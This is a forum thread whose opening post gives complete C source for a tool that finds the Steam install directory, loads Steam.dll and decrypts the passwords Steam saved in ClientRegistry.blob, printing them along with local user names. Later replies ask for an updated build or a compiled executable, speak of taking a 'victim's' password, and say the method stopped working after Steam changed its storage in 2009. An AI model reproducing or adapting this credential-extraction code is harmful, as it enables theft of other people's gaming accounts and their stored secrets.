Gonzalez Posted September 7, 2009 Report Share Posted September 7, 2009 It decrypt's the saved Steam Passwords using the Steam.dll.(I've added two functions and cleaned up the source.)If you want to learn something this is your chance.by five-three-nine //// DecryptStoredSteamPassword.c//// Combines Luigi's ClientRegistry.blob parsing function(s)// with VALVe's exported SteamDecryptDataForThisMachine() function//// small code changes and comments added by desxor// again some changes and fuctions were added by Five-Three-Nine#include <stdio.h>#include <stdint.h>#include <string.h>#include <sys/stat.h>#include <windows.h>void GetSteamDic(char *Path);void SteamParseEncryptedPassPhrase(uint8_t *fname);uint8_t *find_data(uint8_t *buff, int buffsz, uint8_t *str);typedef int (__cdecl *SteamDecryptDataForThisMachine_t)(char *a, int b, char *c, int d, int *e);SteamDecryptDataForThisMachine_t SteamDecryptDataForThisMachine;int main(int argc, char *argv[]) { HANDLE hSteamDLL; /* Find Steam Dir */ char SteamPath[100] = {}; char SteamDll[100] = {}; char SteamBlob[100] = {}; char SteamUser[100] = {}; GetSteamDic(SteamPath); strcat(SteamDll,SteamPath); strcat(SteamDll,"\\Steam.dll"); strcat(SteamBlob,SteamPath); strcat(SteamBlob,"\\ClientRegistry.blob"); strcat(SteamUser,SteamPath); strcat(SteamUser,"\\SteamApps\\*"); printf("%s\n%s\n%s\n%s\n\n",SteamPath,SteamDll,SteamBlob,SteamUser); hSteamDLL = LoadLibrary(SteamDll); if(!hSteamDLL) { printf("\nError: the file STEAM.DLL has not been found.\n"); exit(1); } SteamDecryptDataForThisMachine = (void *)GetProcAddress(hSteamDLL, "SteamDecryptDataForThisMachine"); if(!SteamDecryptDataForThisMachine) { printf("\nError: the function SteamDecryptDataForThisMachine has not been found.\n"); exit(1); } SteamParseEncryptedPassPhrase(SteamBlob); FreeLibrary(hSteamDLL); /* Addon: Find Steam Users */ printf("\nSteam User Names:\n"); HANDLE fHandle; WIN32_FIND_DATA wfd; fHandle=FindFirstFile(SteamUser,&wfd); do { if (!( (wfd.cFileName[0]=='.') && ( (wfd.cFileName[1]=='.' && wfd.cFileName[2]==0) || wfd.cFileName[1]==0 ) )) { if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) { if((strcmp(wfd.cFileName,"SourceMods") != 0) && (strcmp(wfd.cFileName,"common") != 0)) { printf("%s\n",wfd.cFileName); } } } } while (FindNextFile(fHandle,&wfd)); FindClose(fHandle); return(0);}void SteamParseEncryptedPassPhrase(uint8_t *fname) { int len, fdsize, pwds; uint16_t nlen; uint8_t *fdbuff, *fdnext, *p, *buff; char decpass[100]; struct stat xstat; FILE *fd; fd = fopen(fname, "rb"); if(!fd) { printf("Could not open %s for reading/memory search.\n", fname); exit(1); } else { fstat(fileno(fd), &xstat); fdbuff = malloc(xstat.st_size); if(!fdbuff) { printf("Could not allocate file into memory.\n"); // comments for the following are pretty much the same as below so look there for // a more detailed description of what's going on len = strlen(fname); fdsize = 64 + len; fdbuff = malloc(fdsize); p = fdbuff; p += sprintf(p, "%-30s", "\x50\x68\x72\x61\x73\x65\x01\x50"); *(uint16_t *)p = 0; p += 2; *(uint32_t *)p = len; p += 4 + 0; strcpy(p, fname); fclose(fd); goto next; } // load our file into memory for searching and reading its data fread(fdbuff, 1, xstat.st_size, fd); fclose(fd); fdsize = xstat.st_size; } next: fdnext = fdbuff; for(pwds = 0;; pwds++) { // search for unique phrase text using memcmp(), using a great little function provided by Luigi A. // his function will search the entire allocated memory for the data you specify and return with it // if its found, otherwise null p = find_data(fdnext, fdsize, "\x50\x68\x72\x61\x73\x65\x01\x50"); if(!p) { if(pwds) break; printf("An encrypted and stored password could not be located, exiting.\n"); exit(1); } // skip 30 bytes past the PHRASE text to the encrypted password until we come // to "04 00" or simply 4, (0x04 + (0x00 * 256)), we now have 24 bytes remaining p += 30; // this is the 16 bit number we are looking for, save it in the following format: // num = byte1 + (byte2 * 256) nlen = *(uint16_t *)p; // skip the next 2 bytes of the 16bit number we just saved p += 2; // after we skipped 2 bytes, we come to 32bit number (4 bytes) which should always be the // size of our encrypted string, it should appear as "5c 00 00 00", which equals 0x5c or simply, 92 // save this in the same format as before len = *(uint32_t *)p; // now we skip the 4 bytes that we _just read_ PLUS the amount of bytes specified by the first // 16 bit number we just saved, should be 2 bytes anyhow // this should now bring us to our encrypted password located in ClientRegistry.blob which should be // 92 (0x5c) characters long p += 4 + nlen; // an example of the data, provided by Luigi: // 50 68 72 61 73 65 01 50 7e 00 00 00 00 00 00 00 Phrase.P~....... // 04 00 04 00 00 00 01 00 00 00 02 00 00 00 04 00 ................ // 5c 00 00 00 02 00 00 00 39 41 46 41 42 44 39 36 \.......9AFABD96 // 32 30 43 45 43 34 39 31 46 38 33 44 43 45 31 32 20CEC491F83DCE12 // 36 33 33 44 39 43 44 41 41 44 45 30 42 36 46 46 633D9CDAADE0B6FF // 41 32 42 42 45 30 31 32 45 38 39 32 37 33 36 39 A2BBE012E8927369 // 35 32 35 37 43 44 43 45 39 35 37 32 41 37 30 38 5257CDCE9572A708 // 38 42 32 43 41 43 30 33 37 44 43 38 33 33 36 33 8B2CAC037DC83363 // 33 33 35 35 12 00 2a 00 00 00 43 6c 6f 63 3355..*...Cloc fdsize -= (p - fdnext); fdnext = p; // as long as our length is greater than zero but no bigger than fdsize, execute the exported decryption function if((len > 0) && (len < fdsize)) { // null terminate the end of our string, otherwise it will cause problems p[len] = 0; printf("Found stored encrypted password:\n \"%s\"\n\n", p); if(!SteamDecryptDataForThisMachine(p, strlen(p), decpass, sizeof(decpass), &len)) { printf("Password: %.*s\n\n", len, decpass); } else { printf("Unable to decrypt the stored password, is this the same machine it was encrypted on?\n"); } } } free(fdbuff);}uint8_t *find_data(uint8_t *buff, int buffsz, uint8_t *str) { int strsz; uint8_t *limit; strsz = strlen(str); limit = buff + buffsz - strsz; for(; buff <= limit; buff++) { if(!memcmp(buff, str, strsz)) return(buff); }return(NULL);}void GetSteamDic(char *Path) { HKEY hKey; DWORD size; RegOpenKey(HKEY_LOCAL_MACHINE, "Software\\Valve\\Steam", &hKey); RegQueryValueEx(hKey, "InstallPath", NULL, NULL,Path, &size); RegCloseKey(hKey);} Quote Link to comment Share on other sites More sharing options...
linkaaans Posted April 8, 2013 Report Share Posted April 8, 2013 Maybe you can try make it work with the new encryption? The password is now stored in theese files:SteamAppData.vdf and and config.vdf and the steam guard file. Steam guard file starts with ssfn and a lot of numbers, example;ssfn340021771942606398You can find the steam guard file in your steam directory, and for the other files steam\config\What is the difference between this and:https://rstforums.com/forum/17013-c-steam-decrypt.rstIs ^ the new one? Maybe you could tell a noob like me on what programs to use and how to compile the code?Or maybe you could supply an already compiled exe? Quote Link to comment Share on other sites More sharing options...
tawdarky Posted April 9, 2013 Report Share Posted April 9, 2013 Maybe you can try make it work with the new encryption? The password is now stored in theese files:SteamAppData.vdf and and config.vdf and the steam guard file. Steam guard file starts with ssfn and a lot of numbers, example;ssfn340021771942606398You can find the steam guard file in your steam directory, and for the other files steam\config\What is the difference between this and:https://rstforums.com/forum/17013-c-steam-decrypt.rstIs ^ the new one? Maybe you could tell a noob like me on what programs to use and how to compile the code?Or maybe you could supply an already compiled exe? Don't you see this post is 4 years old? Quote Link to comment Share on other sites More sharing options...
ghini Posted April 9, 2013 Report Share Posted April 9, 2013 deci daca ii cer cuiva steam.dll ii pot lua parola? Quote Link to comment Share on other sites More sharing options...
Maximus Posted April 9, 2013 Report Share Posted April 9, 2013 Quote Link to comment Share on other sites More sharing options...
tawdarky Posted April 9, 2013 Report Share Posted April 9, 2013 deci daca ii cer cuiva steam.dll ii pot lua parola?Nu.Chestia asta mergea acu cativa ani,au schimbat modul de criptare al parolei.Si oricum stiu ca mergea doar pe calculatorul unde este logat respectivul pentru ca avea nevoie de niste intrari din registrii windows-ului.Steam password decoder 0.2.4 (steampwd)IMPORTANT NOTE: from the 29 Sep 2009 Steam no longer saves the full password so this tool is now totally useless.decrypts the passwords stored in the local ClientRegistry.blob file and the ConnectCache cookies in the registry.remember that Steam uses an unique key to encrypt the password so if you have reinstalled your Windows you could be not able to recover it, the only exception is with Vista where the key is usually ever the same due to some technical reasons.works also from command-line allowing to pass directly the encrypted password and the needed key.the tool automatically tests the NoMachineSpecificPassphraseAvailable key if the provided/calculated one is wrong (1.0.0.0) Quote Link to comment Share on other sites More sharing options...
raynor009 Posted April 9, 2013 Report Share Posted April 9, 2013 Oricum daca nu ai parola si emailul victimei nu poti face nimic daca are steam guard pornit. Quote Link to comment Share on other sites More sharing options...
khushi11 Posted October 9, 2018 Report Share Posted October 9, 2018 This dll file is the common file and also the popular file but if you are facing any of the problem then download Steam.dll file from the trusted website and i am sure it will be helpful for you. Quote Link to comment Share on other sites More sharing options...